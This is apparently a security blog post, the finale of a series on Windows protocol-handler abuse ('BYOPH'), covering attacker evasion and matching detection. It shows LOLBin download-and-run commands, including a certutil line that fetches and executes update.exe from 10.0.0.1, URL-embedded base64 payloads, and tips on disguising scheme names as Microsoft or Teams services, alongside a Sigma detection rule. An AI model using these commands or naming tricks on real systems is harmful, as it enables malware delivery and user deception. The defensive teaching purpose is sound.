What Advanced Attackers Do Differently

Series: Decoding BYOPH (Part 7 of 7 - FINALE) Reading time: 8 minutes Skill level: Advanced

πŸ“ LinkedIn Post Content

Good news: You now know how to detect basic BYOPH attacks. Bad news: Sophisticated attackers don’t use powershell.exe in their handlers.

In this series finale, we explore advanced OPSEC techniquesβ€”and how to evolve your defenses.

🎯 What You’ll Learn Today

βœ… Why attackers avoid cmd.exe and PowerShell βœ… LOLBins (Living Off The Land Binaries) alternatives βœ… Custom handler techniques that evade detection βœ… How to adapt your detection for advanced threats βœ… The bigger picture: defending against feature abuse

🚨 The Problem with Basic Detection

If your detection rules only look for this:

1

command contains "powershell.exe" OR "cmd.exe"

You’ll catch script kiddies. You won’t catch professionals.

Advanced adversaries know these processes are heavily monitored. They use alternatives.

πŸ“Š Detection Risk Spectrum

1
2
3
4
5
6
7
8

HIGH DETECTION RISK           LOW DETECTION RISK
β”œβ”€β”€ powershell.exe            β”œβ”€β”€ Custom compiled EXE
β”œβ”€β”€ cmd.exe                   β”œβ”€β”€ Direct WinAPI calls
β”œβ”€β”€ wscript.exe               β”œβ”€β”€ In-memory execution
β”œβ”€β”€ cscript.exe               └── URL-embedded payloads
└── mshta.exe

The sophistication increases β†’
Approach Detection Risk Why
PowerShell one-liner VERY HIGH AMSI, logging, heavy monitoring
cmd.exe chains HIGH Command-line logging everywhere
LOLBins (mshta, etc.) MEDIUM Known but less monitored
Custom handler EXE LOW-MEDIUM Behavior-based detection only
Custom + in-memory LOW Minimal artifacts

πŸ”§ Alternative 1: LOLBins

Living Off The Land Binaries are legitimate Windows tools that can be misused:

LOLBin Capability Example
certutil.exe Download files -urlcache -f http://...
bitsadmin.exe Background download /transfer job http://...
msiexec.exe Execute MSI /q /i http://...
regsvr32.exe Scriptlet execution /s /n /u /i:http://... scrobj.dll
rundll32.exe DLL execution Various techniques

Example handler command:

1

certutil.exe -urlcache -f http://10.0.0.1/update.exe %TEMP%\svc.exe && %TEMP%\svc.exe

Detection adaptation: Add LOLBins to your Sigma rules!

πŸ”§ Alternative 2: Custom Compiled Handler

The most OPSEC-conscious approach: build your own handler.

Characteristics: β€’ Uses direct WinAPI calls (no shell spawning) β€’ Performs network operations via WinHTTP/WinINet β€’ Executes shellcode in-memory β€’ Leaves minimal command-line artifacts

Registry command looks innocent:

1

"C:\Users\Public\UpdateHelper.exe" "%1"

What detection sees: A random EXE launched with a URL argument. No PowerShell. No cmd. No obvious indicators.

Detection adaptation: Focus on behavior, not signatures.

πŸ”§ Alternative 3: URL-Embedded Payloads

Embed the payload data directly in the URL:

1

myscheme://action?data=SGVsbG8gV29ybGQ=&key=abc123

The handler:

  1. Parses the URL
  2. Extracts base64-encoded data
  3. Decodes and executes

Benefits for attackers: β€’ No network callback required β€’ Single-stage execution β€’ Harder to detect via network monitoring β€’ All data is in the invoking URL

🎭 OPSEC: Protocol Naming

Sophisticated attackers use trustworthy-appearing scheme names:

Suspicious Better Tradecraft
hack:// microsoft-update://
payload:// teams-auth://
evil:// sharepoint-connect://
ping:// onedrive-sync://

Why it matters: β€’ Browser prompts show the scheme name β€’ Registry audits may spot obvious malicious names β€’ Users are more likely to click β€œOpen” for familiar-sounding schemes

πŸ›‘οΈ Evolved Detection Strategies

To catch advanced BYOPH, evolve your approach:

1. Behavior-Based Detection Focus on what the handler DOES, not what it IS: β€’ Network connections after handler execution β€’ File writes to unusual locations β€’ Memory injection patterns

2. Parent-Child Analysis Alert on unusual parent-child relationships: β€’ Browser β†’ Unknown EXE β€’ Office app β†’ Unknown EXE β€’ PDF reader β†’ Unknown EXE

3. Registry Anomaly Detection β€’ New schemes not in baseline β€’ Schemes matching known software but different paths β€’ Handler executables in unusual locations (%TEMP%, %APPDATA%, C:\Users\Public)

4. Threat Intelligence Integration β€’ Known malicious scheme names β€’ Known staging paths β€’ Known C2 patterns

πŸ“Š Advanced Detection Sigma Rule

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

title: Suspicious Protocol Handler - Advanced Indicators
detection:
    selection_path:
        TargetObject|contains: '\Software\Classes\'
        TargetObject|endswith: '\shell\open\command'
    selection_locations:
        Details|contains:
            - '\Users\Public\'
            - '\AppData\'
            - '\Temp\'
            - '%TEMP%'
            - '%APPDATA%'
    selection_lolbins:
        Details|contains:
            - 'certutil'
            - 'bitsadmin'
            - 'msiexec'
            - 'regsvr32'
    condition: selection_path and (selection_locations or selection_lolbins)
level: high

πŸŽ“ The Bigger Picture

BYOPH represents a broader security challenge: legitimate feature abuse.

Windows protocol handlers are designed to work this way. The same is true for: β€’ Scheduled tasks β€’ COM objects β€’ WMI subscriptions β€’ Office macros (when enabled)

The lesson: Features become attack surfaces. Defense requires understanding both the mechanism AND the abuse patterns.

πŸ“Œ Series Recap: Key Takeaways

Part 1: Protocol handlers are registry entries that map URL schemes to applications

Part 2: Analyze artifacts to extract IoCs and understand attack patterns

Part 3: Build benign handlers to understand the mechanism safely

Part 4: HKCU requires no admin and takes precedence over HKLM

Part 5: Any URL-rendering application can invoke handlers

Part 6: Registry monitoring + Sysmon + Sigma = Detection foundation

Part 7: Advanced attackers use LOLBins, custom handlers, and OPSEC tradecraft

πŸ™ Thank You!

This concludes the BYOPH series. I hope it’s helped you understand this technique from both offensive and defensive perspectives.

What you can do now:

  1. Audit your environment for unexpected handlers
  2. Implement the detection rules from Part 6
  3. Train users about .reg file and external application risks
  4. Share this knowledge with your team

⚠️ FINAL REMINDER

1
2
3
4
5
6
7
8

Use this knowledge responsibly.

βœ“ Only test on systems you own or have authorization for
βœ“ Follow ethical guidelines and laws
βœ“ Report vulnerabilities through proper channels
βœ“ Focus on improving defenses

Security knowledge is a responsibility.

πŸ’¬ Series Feedback

I’d love to hear from you: β€’ Which part was most valuable? β€’ What would you like me to cover next? β€’ How are you applying this in your work?

Share in the comments!

πŸ“š Want More?

If you found this series valuable: β€’ Follow me for future security content β€’ Share the series with your security team β€’ Connect if you want to discuss further

The full series with code samples is available on my GitHub.

#Cybersecurity #InfoSec #BlueTeam #RedTeam #OPSEC #ThreatHunting #BYOPH #SecurityResearch #WindowsSecurity #AdvancedThreats